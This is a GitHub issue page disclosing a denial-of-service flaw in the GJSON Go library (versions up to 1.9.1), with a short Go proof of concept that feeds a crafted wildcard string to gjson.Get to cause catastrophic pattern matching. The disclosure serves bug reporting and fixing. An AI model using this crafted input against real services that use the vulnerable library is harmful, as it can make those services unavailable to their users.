Skip to content

gjson.Get can cause DoS attacks. GJSON <= 1.9.1 allows attackers to cause a redos via crafted JSON input. #236

@cmdrgh

Description

@cmdrgh

func main() {
testJson := #[%"*?**?**?**?**?**?***?**?**?**?**?*"""]
gjson.Get(testJson, testJson)
}

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions